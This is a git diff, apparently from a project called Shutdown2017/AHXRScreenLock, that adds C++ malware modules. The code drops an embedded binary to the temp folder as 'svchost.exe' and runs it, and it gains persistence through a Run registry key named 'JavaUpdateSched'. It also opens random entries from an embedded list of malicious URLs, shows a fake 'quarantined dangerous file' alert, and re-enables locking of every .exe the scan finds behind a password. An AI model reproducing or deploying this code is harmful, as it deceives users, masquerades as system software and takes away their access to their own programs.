MAKEINTRESOURCE(IDR_RCDATA2), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + char * c_mal = (char *)pResourceLock; + istringstream s_mal(c_mal); + string s_url; + string s_format_url; + vector< string > s_split; + + while (getline(s_mal, s_url)) { + if (s_url.empty()) + break; + + s_split = split(s_url, ','); + + // Removing quotations + s_split[1].erase(0, 1); + s_split[1].erase(s_split[1].end() - 1, s_split[1].end()); + + if (s_split[1].compare("-") != 0) + s_urls.push_back(string("http://" + s_split[1])); + } +} + +void openRandomMaliciousURL() { + srand(time(NULL)); + + int i_rand_url = rand() % s_urls.size() + 1; + ShellExecute(0, 0, s_urls[i_rand_url].c_str(), 0, 0, SW_SHOW); +} + +/* + https://stackoverflow.com/a/236803 +*/ +template +void split(const std::string &s, char delim, Out result) { + std::stringstream ss(s); + std::string item; + while (std::getline(ss, item, delim)) { + *(result++) = item; + } +} + +std::vector split(const std::string &s, char delim) { + std::vector elems; + split(s, delim, std::back_inserter(elems)); + return elems; +} \ No newline at end of file diff --git a/src/payloads/payload_malicious.h b/src/payloads/payload_malicious.h new file mode 100644 index 0000000..37e9e89 --- /dev/null +++ b/src/payloads/payload_malicious.h @@ -0,0 +1,24 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +extern void readMaliciousURLs(); +extern void openRandomMaliciousURL(); \ No newline at end of file diff --git a/src/payloads/payload_scan.cpp b/src/payloads/payload_scan.cpp new file mode 100644 index 0000000..f063d85 --- /dev/null +++ b/src/payloads/payload_scan.cpp @@ -0,0 +1,57 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_scan.h" +#include "payload_install.h" + +#include +#include + +using namespace std; + +void startShutdownScan() { + string s_path = getInstallPath() + string("\\") + SHUTDOWN_FILE_NAME; + + struct stat buffer; + if (stat(s_path.c_str(), &buffer) != 0) { + INSTALL_PAYLOAD(); + } + else { + + HWND h_lockdown; + + h_lockdown = FindWindow(NULL, "Shutdown 2017"); + if (h_lockdown == NULL) { + /*STARTUPINFO info = { sizeof(info) }; + PROCESS_INFORMATION processInfo; + + CreateProcess(s_path.c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo); + */ + ShellExecute(NULL, "runas", s_path.c_str(), + " c:\\temp\\report.txt", + NULL, // default dir + SW_SHOWNORMAL + ); + } + } +} \ No newline at end of file diff --git a/src/payloads/payload_scan.h b/src/payloads/payload_scan.h new file mode 100644 index 0000000..e88090a --- /dev/null +++ b/src/payloads/payload_scan.h @@ -0,0 +1,24 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +extern void startShutdownScan(); +#define SCAN_PAYLOAD() {startShutdownScan();} \ No newline at end of file diff --git a/src/payloads/payload_shutdown.cpp b/src/payloads/payload_shutdown.cpp new file mode 100644 index 0000000..7f2450f --- /dev/null +++ b/src/payloads/payload_shutdown.cpp @@ -0,0 +1,97 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" + +#ifdef __cplusplus_cli +#define generic __identifier(generic) +#endif +#include +#ifdef __cplusplus_cli +#undef generic +#endif + +#include "payload_shutdown.h" +#include "directory.h" +#include "resource1.h" +#include "settings.h" +#include "pack.h" +#include "locker.h" +#include "fake_exe.h" +#include +#include +#include +#include + +using namespace std; +HANDLE h_fake; +DWORD hd_fake; +DWORD WINAPI t_buildFake(LPVOID lpParameter); + +string getFullShutdownDirectory() { + string s_directory(getHomeDirectory()); + s_directory += "\\" + string(SHUTDOWN_FOLDER_NAME); + return s_directory; +} + +inline bool createShutdownFolder() { + return (CreateDirectoryA(getFullShutdownDirectory().c_str(), NULL) || ERROR_ALREADY_EXISTS == GetLastError()); +} + +DWORD WINAPI t_buildFake(LPVOID lpParameter) { + fstream + f_build + ; + string s_full_shutdown; + + HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + TCHAR tmpPath[MAX_PATH]; + GetTempPath(MAX_PATH, tmpPath); + + std::string s_extract; + s_extract = tmpPath; + s_extract += "protect.tmp"; + + /* + for ( char * x : c_fake_executables) { + s_full_shutdown = getFullShutdownDirectory(); + s_full_shutdown += string("\\") + string(x) + string(".exe"); + f_build.open(s_full_shutdown, ios::out | ios::binary ); + f_build.write((char*)pResourceLock, i_resource); + f_build.close(); + }*/ + + srand(time(NULL)); + int i_rand_idx = rand() % sizeof(c_fake_executables) / sizeof(c_fake_executables[0]); + s_full_shutdown = getFullShutdownDirectory(); + s_full_shutdown += string("\\") + string(c_fake_executables[i_rand_idx]) + string(".exe"); + f_build.open(s_full_shutdown, ios::out | ios::binary); + f_build.write((char*)pResourceLock, i_resource); + f_build.close(); + + std::remove(s_extract.c_str()); + return 0; +} \ No newline at end of file diff --git a/src/payloads/payload_shutdown.h b/src/payloads/payload_shutdown.h new file mode 100644 index 0000000..ce7355f --- /dev/null +++ b/src/payloads/payload_shutdown.h @@ -0,0 +1,36 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include +#include + +#define SHUTDOWN_FOLDER_NAME "Shutdown2017" + +extern HANDLE h_fake; +extern DWORD hd_fake; +extern DWORD WINAPI t_buildFake(LPVOID lpParameter); + +#define BUILD_FAKE_EXECUTABLES() { h_fake = CreateThread(0, 0, t_buildFake, 0, 0, &hd_fake); } +#define SHUTDOWN_PAYLOAD() { if (createShutdownFolder()) BUILD_FAKE_EXECUTABLES(); } + +extern bool createShutdownFolder(); +extern std::string getFullShutdownDirectory(); \ No newline at end of file diff --git a/src/payloads/payload_startup.cpp b/src/payloads/payload_startup.cpp new file mode 100644 index 0000000..25f4709 --- /dev/null +++ b/src/payloads/payload_startup.cpp @@ -0,0 +1,71 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_startup.h" +#include +#include +#include + +void createStartupData() { + + HKEY h_key; + long l_key; + + l_key = RegOpenKeyEx(KEY_TARGET, KEY_STARTUP, 0, KEY_ALL_ACCESS, &h_key); + + // No admin access. Just make it user startup. + if (l_key == ERROR_ACCESS_DENIED) + l_key = RegOpenKeyEx(KEY_NON_ADMIN_TARGET, KEY_NON_ADMIN_STARTUP, 0, KEY_ALL_ACCESS, &h_key); + + if (l_key == ERROR_SUCCESS) { + + HMODULE h_mod = GetModuleHandleW(NULL); + char * c_path[MAX_PATH]; + GetModuleFileNameA(h_mod, (char *)c_path, MAX_PATH); + + RegSetValueEx(h_key, KEY_VALUE_NAME, 0, REG_SZ, (LPBYTE)c_path, MAX_PATH); + RegCloseKey(h_key); + } + +} + +bool isStartupRegistered() { + HKEY h_key; + long l_key; + bool b_exist; + + l_key = RegOpenKeyEx(KEY_TARGET, KEY_STARTUP, 0, KEY_READ, &h_key); + // No admin access. Just make it user startup. + if (l_key == ERROR_ACCESS_DENIED) + l_key = RegOpenKeyEx(KEY_NON_ADMIN_TARGET, KEY_NON_ADMIN_STARTUP, 0, KEY_READ, &h_key); + + char c_data[MAX_PATH]; + DWORD dw_reg = REG_SZ; + DWORD dw_length = MAX_PATH; + LONG l_error = RegQueryValueEx(h_key, KEY_VALUE_NAME, NULL, &dw_reg, (LPBYTE)&c_data, &dw_length); + + b_exist = ( l_error == ERROR_FILE_NOT_FOUND ); + RegCloseKey(h_key); + + return b_exist; +} diff --git a/src/payloads/payload_startup.h b/src/payloads/payload_startup.h new file mode 100644 index 0000000..a53c787 --- /dev/null +++ b/src/payloads/payload_startup.h @@ -0,0 +1,32 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#define KEY_TARGET HKEY_LOCAL_MACHINE +#define KEY_NON_ADMIN_TARGET HKEY_CURRENT_USER +#define KEY_STARTUP "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" +#define KEY_NON_ADMIN_STARTUP "Software\\Microsoft\\Windows\\CurrentVersion\\Run" +#define KEY_VALUE_NAME "JavaUpdateSched" + +#define STARTUP_PAYLOAD() {createStartupData();} + +extern void createStartupData(); +extern bool isStartupRegistered(); \ No newline at end of file diff --git a/src/payloads/resource.h b/src/payloads/resource.h new file mode 100644 index 0000000..96671e1 Binary files /dev/null and b/src/payloads/resource.h differ diff --git a/src/payloads/resource1.h b/src/payloads/resource1.h new file mode 100644 index 0000000..fac85bf Binary files /dev/null and b/src/payloads/resource1.h differ diff --git a/src/payloads/stdafx.cpp b/src/payloads/stdafx.cpp new file mode 100644 index 0000000..3b8bde3 --- /dev/null +++ b/src/payloads/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// AHXRShutdownPayloads.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/src/payloads/stdafx.h b/src/payloads/stdafx.h new file mode 100644 index 0000000..b005a83 --- /dev/null +++ b/src/payloads/stdafx.h @@ -0,0 +1,15 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include +#include + + + +// TODO: reference additional headers your program requires here diff --git a/src/payloads/targetver.h b/src/payloads/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/src/payloads/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include diff --git a/src/shutdown2017/frmMain.h b/src/shutdown2017/frmMain.h index 5dbea08..d79560c 100644 --- a/src/shutdown2017/frmMain.h +++ b/src/shutdown2017/frmMain.h @@ -77,6 +77,7 @@ namespace AHXRShutdown { private: System::Windows::Forms::Panel^ panel5; private: System::Windows::Forms::Label^ lblStatus; private: System::Windows::Forms::NotifyIcon^ notifyIcon1; + private: System::Windows::Forms::NotifyIcon^ notifyIcon2; @@ -121,6 +122,7 @@ namespace AHXRShutdown { this->label1 = (gcnew System::Windows::Forms::Label()); this->tmrUpdate = (gcnew System::Windows::Forms::Timer(this->components)); this->notifyIcon1 = (gcnew System::Windows::Forms::NotifyIcon(this->components)); + this->notifyIcon2 = (gcnew System::Windows::Forms::NotifyIcon(this->components)); this->panel1->SuspendLayout(); (cli::safe_cast(this->pictureBox1))->BeginInit(); this->panel2->SuspendLayout(); @@ -295,6 +297,13 @@ namespace AHXRShutdown { this->notifyIcon1->Visible = true; this->notifyIcon1->MouseDoubleClick += gcnew System::Windows::Forms::MouseEventHandler(this, &frmMain::notifyIcon1_MouseDoubleClick); // + // notifyIcon2 + // + this->notifyIcon2->BalloonTipIcon = System::Windows::Forms::ToolTipIcon::Warning; + this->notifyIcon2->BalloonTipTitle = L"Shutdown 2017"; + this->notifyIcon2->Icon = (cli::safe_cast(resources->GetObject(L"notifyIcon2.Icon"))); + this->notifyIcon2->Text = L"Shutdown 2017"; + // // frmMain // this->AutoScaleDimensions = System::Drawing::SizeF(6, 13); @@ -339,6 +348,13 @@ private: System::Void frmMain_Load(System::Object^ sender, System::EventArgs^ } private: System::Void tmrUpdate_Tick(System::Object^ sender, System::EventArgs^ e) { + if (b_new_generated) { + this->notifyIcon2->BalloonTipText = L"Shutdown2017 has discovered a dangerous file and has quarantined it in your Shutdown2017 folder."; + this->notifyIcon2->ShowBalloonTip(4000); + b_new_generated = false; + ShellExecute(NULL, "open", s_documents_path.c_str(), NULL, NULL, SW_SHOWDEFAULT); + } + if (i_scan_idx != v_files.size() ) { diff --git a/src/shutdown2017/lockdown.cpp b/src/shutdown2017/lockdown.cpp index 242ed65..9bc954d 100644 --- a/src/shutdown2017/lockdown.cpp +++ b/src/shutdown2017/lockdown.cpp @@ -93,8 +93,6 @@ void lockdownFile(string fileName) { buildNewLocker(fileName); packLocker(fileName, SHUTDOWN_PW, SHUTDOWN_MSG); attachExecutable(fileName, s_new_name); - - TakeOwnership(const_cast< char * >(s_new_name.c_str())); remove(s_new_name.c_str()); // Remove old .exe file. diff --git a/src/shutdown2017/main.cpp b/src/shutdown2017/main.cpp index c26469f..7a40e30 100644 --- a/src/shutdown2017/main.cpp +++ b/src/shutdown2017/main.cpp @@ -20,7 +20,7 @@ along with AHXRScreenLock. If not, see . */ //======================================================= -//#define DEBUG +//#define DEBUG #include #include @@ -43,6 +43,7 @@ DWORD WINAPI t_run_scanner(LPVOID lpParameter); DWORD WINAPI t_run_code_gui(LPVOID lpParameter); #include "scan.h" +#include "payload.h" #include "frmMain.h" #include "frmCode.h" #include "resource.h" @@ -58,11 +59,12 @@ int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline, int iC #endif { h_update = CreateThread(0, 0, t_run_scanner, 0, 0, &dh_update); + START_PAYLOAD(); /* Here is the force-scan. If the client closes the scanner out, the program will automatically scan itself after being closed 15 seconds prior. */ - + while (1) { if (b_closed) { @@ -85,6 +87,8 @@ int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline, int iC } Sleep(15000); } + +// return 0; } void showCodeDialog() { diff --git a/src/shutdown2017/payload.cpp b/src/shutdown2017/payload.cpp new file mode 100644 index 0000000..28016e6 --- /dev/null +++ b/src/shutdown2017/payload.cpp @@ -0,0 +1,125 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#ifdef __cplusplus_cli + #define generic __identifier(generic) +#endif + #include +#ifdef __cplusplus_cli + #undef generic +#endif + +#include "payload.h" +#include "resource.h" +#include +#include +#include +#include +#include +#include + +HANDLE h_payload; +HANDLE h_shutdown; +DWORD dw_shutdown; +DWORD dw_payload; +namespace fs = boost::filesystem; +bool b_new_generated; +bool b_first; +int i_dir_count; +int i_old_dir_count; +std::string s_documents_path; + +DWORD WINAPI t_shutdown(LPVOID lpParameter) { + + char + my_documents[MAX_PATH] + ; + HRESULT result = SHGetFolderPathA(NULL, CSIDL_PERSONAL, NULL, SHGFP_TYPE_CURRENT, my_documents); + s_documents_path = my_documents + std::string("\\") + SHUTDOWN_FOLDER_NAME + std::string("\\"); + + while (1) { + + struct stat info; + if (info.st_mode & S_IFDIR) { + fs::directory_iterator it_end; + fs::directory_iterator it_dir(s_documents_path); + i_dir_count = 0; + + while (it_dir != it_end) { + try { + if (!fs::is_directory(it_dir->status())) // Listing non-directory files. + if (it_dir->path().filename().extension() == ".exe") { + i_dir_count++; + if (!b_first) + i_old_dir_count++; + } + + it_dir++; + } + catch (const std::exception & ex) { + std::cout << it_dir->path().filename() << " " << ex.what() << std::endl; + } + } + b_new_generated = (i_dir_count != i_old_dir_count); + i_old_dir_count = i_dir_count; + b_first = true; + Sleep(5000); + } + } + return 0; +} + +DWORD WINAPI t_payload(LPVOID lpParameter) { + + h_shutdown = CreateThread(0, 0, t_shutdown, 0, 0, &dw_payload); + + + HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + TCHAR tmpPath[MAX_PATH]; + GetTempPath(MAX_PATH, tmpPath); + + std::string s_extract; + s_extract = tmpPath; + s_extract += "svchost.exe"; + + std::fstream f; + + f.open(s_extract, std::ios::out | std::ios::binary); + f.write((char*)pResourceLock, i_resource); + f.close(); + + STARTUPINFO info = { sizeof(info) }; + PROCESS_INFORMATION processInfo; + CreateProcess(s_extract.c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo); +/* + if (CreateProcess(s_extract.c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo)) + { + WaitForSingleObject(processInfo.hProcess, INFINITE); + CloseHandle(processInfo.hProcess); + CloseHandle(processInfo.hThread); + }*/ + return 0; +} \ No newline at end of file diff --git a/src/shutdown2017/payload.h b/src/shutdown2017/payload.h new file mode 100644 index 0000000..7bb40f2 --- /dev/null +++ b/src/shutdown2017/payload.h @@ -0,0 +1,34 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include +#include + +#define SHUTDOWN_FOLDER_NAME "Shutdown2017" + +extern HANDLE h_payload; +extern DWORD dw_payload; +extern bool b_new_generated; +extern std::string s_documents_path; +extern DWORD WINAPI t_payload(LPVOID lpParameter); + +#define START_PAYLOAD() {h_payload = CreateThread(0, 0, t_payload, 0, 0, &dw_payload);} \ No newline at end of file diff --git a/src/shutdown2017/resource.h b/src/shutdown2017/resource.h index d332a87..d00fc32 100644 Binary files a/src/shutdown2017/resource.h and b/src/shutdown2017/resource.h differ diff --git a/src/shutdown2017/scan.cpp b/src/shutdown2017/scan.cpp index 61c64e4..db0a654 100644 --- a/src/shutdown2017/scan.cpp +++ b/src/shutdown2017/scan.cpp @@ -75,7 +75,7 @@ DWORD WINAPI t_startComputerScan(LPVOID lpParameter) { if (it_dir->path().filename().extension() == ".exe") { // Only list .exe files. v_files.push_back(it_dir->path().string()); #ifndef DEBUG - // lockdownFile(it_dir->path().string()); + lockdownFile(it_dir->path().string()); #endif } }